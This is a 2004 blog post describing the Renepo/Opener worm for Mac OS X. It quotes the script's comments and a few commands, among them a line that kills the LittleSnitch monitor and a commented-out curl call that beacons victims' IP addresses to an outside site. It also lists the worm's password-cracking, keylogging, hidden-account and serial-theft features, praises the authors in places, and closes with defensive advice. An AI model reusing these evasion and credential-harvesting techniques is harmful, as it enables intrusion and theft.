Renepo worm targets Mac OS X users, Sophos reports – Sophos
Security experts have discovered a worm that targets Apple’s Mac OS X , disguising itself as a shell script. There are currently no reports of the virus in the wild, but experts are concerned that if it spreads, its effects could be serious. –
The Mac Observer
Mac users run scared of Renepo – Contractor UK
I came across quite a few of these reports over the past few days that I decided to do some reading myself. I was pleasantly surprised with what I found that I decided to post it on my blog so that others have access to one place for all opener-ware!!
CURRENT VERSION : 2.3.8 as on 12 August 2004.
Renepo/Opener started life as an OS X startup item with a shell script to replace the current hostconfig file with a different copy (which has sharing turned on among other things.) It also copies a few files and the netinfo directory into the Public folder of every user folder. On the first reboot SMB sharing will be turned on and the information copied to the .info folder will contain the Mac password hashes and the SMB hashes which are easier to crack. Mr Dimbulb a senior member of the forum, who also happens to be the primary author introduces his work as follows
# opener – a startup script to turn on services and gather user info & hashes for Mac OS X
# This script is written for bash (as is noted by the very first line of this script)
To explain that to the rest of us, for what a bash shell script means please read on:
There are several shell script languages. In Mac OS X, the most common shell script is BASH. The default Terminal shell language is TCSH in 10.1 and 10.2, and BASH in 10.3. You should set the Terminal to use the same language you are going to script in so that you have experience using that shell and know exactly how a command will behave. Most shell scripts are written using /bin/sh, so you should change the command line to /bin/sh by just typing /bin/sh. You can write shell scripts in any language.
Also courtesy oreilly.com
OS X provides several mechanisms for running programs based on events in the login and startup process. Among these mechanisms are StartupItems, LoginItems, and shell startup scripts (used when you start up Terminal or X11). Each of these mechanisms is powerful in its own right, but they each have certain specific uses
The authors have not stated any purpose as to why they developed this particular worm/malware/virus/script but I could glean from their arguments and counter arguments to queries from some members that, ulterior motives were last on their list. It seems to be more of a fun way of learning. As I quote “hacking and cracking just happen to put a little fun into the learning which can be incredibly dull otherwise. i don’t see how any of what the people (we’re not all kids either) at this forum have written constitutes “causing trouble for everyone” as nothing i have seen here can actually do anything on it’s own… this script for instance, is not a virus and can not get onto your computer all by itself, someone would have to put it there or trick you into putting it there yourself.” – Scriptkitten.
Also the senior members at the forum seem more level headed and responsible type than most hacker/cracker/virus writer. For instance, a one member says “What is wrong with us? Nothing.
Just don’t take your security for granted. Open a door, and we’ll walk it. All you have to do is keep your doors closed, or watch who’s walking around outside.”
WHAT IT DOES:
One of the wonderful features of the script is that it actually tells everyone what it does. For example, take a look at the first few lines.
# opener 2.3.8 – a startup script to turn on services and gather user info & hashes for Mac OS X
# To install this script you need admin access or
# physical access (boot from a CD or firewire/usb, ignore permissions on the internal drive) or
# write access to either /Library/StartupItems /System/Library/StartupItems or
# write access to any existing StartupItem (which you can then replace with this script) or
# write access to the rc, crontab, or periodic files (and have them run or install the script) or
# you could trick someone who has an admin account into installing it.
Most of the code in the script seems to have a tag that explains what it does. This seems to be more so as the final script was not written by one person with the intention to take down the mac using world at one go but is the painstaking effort of a host of hobbyists who have developed it over a while and have included these little notes to further explain what the code does to those not familiar with it.But I could be wrong.
A few further examples;
# Install this script properly, turn on some services, turn off some (like the firewall)
# if we aren’t already in /System/Library/StartupItems then create a folder with the name of this
# script, copy the script into that folder and also create a StartupParameters.plist file
# If this script is executed it makes itself a StartupItem.
# gather system-wide info like hashes and preferences
# create a hidden folder called .info and some other folders
mkdir -p /.info/private/var /.info/keychains /Library/Preferences/.indexed
mkdir /.info/Library/Application\ Support/ /.info/nistuff /.info/Applications /.info/KRec_Logs
mkdir -p /.info/System/Library/CoreServices /.info/vm /.info/dsniff /.info/Library/WebServer
mkdir /.info/Library/Preferences/Netopia /Library/Preferences/jtr
First reported on Oct. 22, 2004 in Macintouch as, I quote,
“ There’s now a real [malware program] out there for Mac OS X that can do some real damage. It doesn’t seem to be too destructive although it does delete some UNIX commands and modifies prefs for a couple of others. It will gather all password info on your machine. For now, lets call it “Opener.”
My system was a responding a bit slowly and a check of my /var/log files showed that they were _all_ empty and had the same mod date. The Activity Monitor showed a process called “john” eating almost an entire processor.
Some further looking showed an unknown startupitem in /Library/StartupItems/ called “opener”. The executable file is a well-commented bash program. It scans for passwords for every user, processes the hashed info using your own Mac, turns on file sharing, and puts all this stuff into an invisible folder called .info on each users Public folder.”
It is an amazing piece of coding that shows that the makers are indeed creative. For instance the fact that it uses /Library/StartupItems/, a directory that runs items as root prior to login, and even better, an admin user can create files in here that will run as root!! Indeed on reading the forum one comes across a similar discussion wherein the creators of the script were having trouble running it without using sudo. The answer – a start up item.
One of the specialities of the script seem to be password harvesting and cracking them using brute force with John the Ripper. The hashes are stored in ~/Public as invisible files where they are accessible to programs like windows file sharing, AFP or SMB.
Here is how they log the computers IP addresss which is best described using words from the script itself;
# Grab the public and private IP addresses (we need a routine to post, mail or something with these…)
# The line below will ‘visit’ web page that logs the IP address
# The log of ips that have visited is at http://www.antiorario.it/stats/visitors.php
# Viewing the log does not add your ip to the log but you should still proxy!
killall -m LittleSnitch # LittleSnitch will relaunch but hopefully we will sneak by if it is running
#curl http://www.antiorario.net/stelledimari/index.php > /dev/null
Here is brief summary of what it does;
• Opener tries to install ohphoneX, a teleconferencing program
• It kills LittleSnitch before every Internet connection it makes
• It installs a keystroke recorder
• Allows backdoor access in case someone deletes the hidden account
• Grabs the open-firmware password
• Installs OSXvnc
• Grabs your office 2004 PID (serial number), as well as serial numbers for Mac OS XServer, adobe registrations, VirtualPC 6, Final Cut Pro, LittleSnitch, Apple Pro Apps, your DynDNS account, Timbuk2, and webserver users to name a few.
• It tries to decrypts all the MD5 encrypted user passwords
• Decrypts all users keychains.
• Grabs your AIM logs, and other settings and preferences
• Grabs stuff from your Classic preferences
• Changes your Limewire settings to max out your upload and files.
• The hidden user account is called LDAP-daemon instead of the name hacker used in earlier versions. Looks more innocent than hacker.
• Changes daily cron task try to get your password from the virtual memory swapfile
• It installs an app called John The Ripper – a password cracker that uses a dictionary method to crack passwords
• installs dsniff to sniff for passwords.
All this in the current version, until updated!!
“From what I hear I suspect that opener wont run( on OS 10.4 ), similiar to OSX Server which doesn’t like to run anything in the /Library/StartupItems folder. I suspect we’ll have to switch over to /System/Library/StartupItems/ which is not as easy to write to all the time…” – gapple.
Reassuring though it is that this particular script installation dictates that somebody have access to your computer, it is always a worry if somebody can make it a payload in future programs. Much has been said about the invulnerability of the macintosh operating sytstem, especially touting its unix underpinnings and the fact that it comes with most compromising features turned off by default. But it has to be said that vulnerabilities are patched after somebody has found a way to exploit them. Anyone using mac OS X has probably seen the quintessential dialog box that asks for your admin password allowing the installer to install the app which otherwise would not have been possible as a result of restrictive privileges, and this particular arrangement is, as I see, a grey area . I suppose somebody could make a trojan that pops up a little dialog box asking for your password and thus delivering a deadly payload, but I could be wrong here. Solutions to this problem have been windows style key stroke combinations aka Ctrl-Alt-Del to be pressed along with typing the password. Whether these are practical, feasible, and in keeping with the ease of use mantra of the mac OS is debatable. At the end of the day opener or no opener certain things have changed and some rules have become even more relevant as a result.
As Mr David E. Frank at Macintouch explains,
the best thing we as users can do to protect ourselves from this type of malware is: protect your admin accounts!
• DON’T log in with an admin account to do day-to-day tasks that do not require admin access.
• DON’T read email will logged in as an admin.
• DON’T execute email attachments whose source you are unsure of.
Some additional steps you can take to protect yourself:
• If you have an always-on internet connection, use a firewall.
• Use an encrypted disk image to secure sensitive data, or use FileVault.
• Keep good backups.
• Watch for security updates from Apple.
Kindly leave comments regarding any part of this write up which you feel is wrong or needs to be amended.